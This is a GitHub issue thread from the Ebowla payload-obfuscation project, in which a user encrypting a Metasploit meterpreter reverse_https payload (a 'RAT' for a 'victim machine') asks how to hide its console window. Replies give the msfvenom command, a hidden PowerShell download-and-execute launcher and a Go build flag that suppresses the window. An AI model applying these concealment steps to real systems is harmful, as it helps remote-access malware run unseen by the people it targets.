### ISSUE TITLE
Cmd.exe-Window not disappering after Ebowla-Encryption

### ISSUE THREAD

**Issue by psycr0w13** [Genetic-Malware/Ebowla#25]
Hello dear Genetic-Malware Team,
I got a little problem with the usage of ebowla Im afraid.
I created a RAT with meterpreter/metasploit and tried to encrypt it using ebowla and some environment variables. Everything works fine besides the thing, that when I start the RAT on the victim machine a cmd.exe window pops up and doesnt close anymore as long as the trojan runs... and if it gets closed the process of the trojan is killed too.
As you can see thats a little problem and rather suboptimal for my use-case.

It would be really great if you could tell me how I can change that and get the window closed fast and automatically, or run it somehow hidden somewhere.

Before somebody tries to bug me, Im becomeing a pentester and this is for my work, so not hacking some poor dudes ;)

Im looking forward to hearing from you.
Thanks in advance,

psycr0w

**Comment by secretsquirrel** [comment]
Did you try setting this to `True`: https://github.com/Genetic-Malware/Ebowla/blob/master/genetic.config#L40

**Comment by psycr0w13** [comment]
Yepp I had it set to True all the time, but same result Im afraid :/ maybe somehow it is left set to true? In the corresponding class (folder encryption) it is set to false in the constructor parameters.
Attached a screenshot of the not-closing cmd.
![ebowlaerror](https://user-images.githubusercontent.com/23707573/44044565-456150ae-9f26-11e8-832e-83e18bdd8690.png)

**Comment by secretsquirrel** [comment]
What metasploit command exactly did you use to make the metp dropper you used in Ebowla?

**Comment by psycr0w13** [comment]
The command was: 
msfvenom --payload windows/x64/meterpreter/reverse_https --format exe --out metpTest.exe LHOST=<Host IP> LPORT=443 (port 443 is free)

I read the help page and looked for helpful options, but couldnt find something corresponding to my problem.

Thanks for your fast help :)

**Comment by secretsquirrel** [comment]
try `--format dll`

**Comment by secretsquirrel** [comment]
I think you will still get a cmd popup. 

You can hide this execution using different methods:
* Using a batch file 
```@echo off
start ebowla.exe
```

* Using powershell
`powershell.exe -windowstyle hidden {download execute ebowla}`


* Using this is the context of another program (BDF->Ebowla): https://www.youtube.com/watch?v=rRm3O7w5GHg

**Comment by psycr0w13** [comment]
Thanks very much for the hints :) ill test them first thing tomorrow and tell you how they worked.

**Comment by secretsquirrel** [comment]
Closing this out..

**Comment by psycr0w13** [comment]
Ok thanks for your help on the topic :)

**Comment by fsacer** [comment]
there is additional thing that does that: https://stackoverflow.com/a/36728885/4965962 just adding `-ldflags -H=windowsgui` to the build command

**Comment by edermi** [comment]
I can verify that @fsacer's solution works. The build command in `build_x64_go.sh`  has to look like this:

```
CXX=x86_64-w64-mingw32-g++; CC=x86_64-w64-mingw32-gcc; CGO_LDFLAGS="-g -lm" GOGCCFLAGS="-m64 -fmessage-length=0" CGO_ENABLED=1 GOOS=windows GOARCH=amd64 go build -ldflags -H=windowsgui $sans_extension.go
```

I think this is something worth to be officially documented or, even better, done automatically (e.g. if `clean_output` is true)

**Comment by psycr0w13** [comment]
Thank you all guys for the great help :) very nice that you found a way to hide the window. That helps a lot.
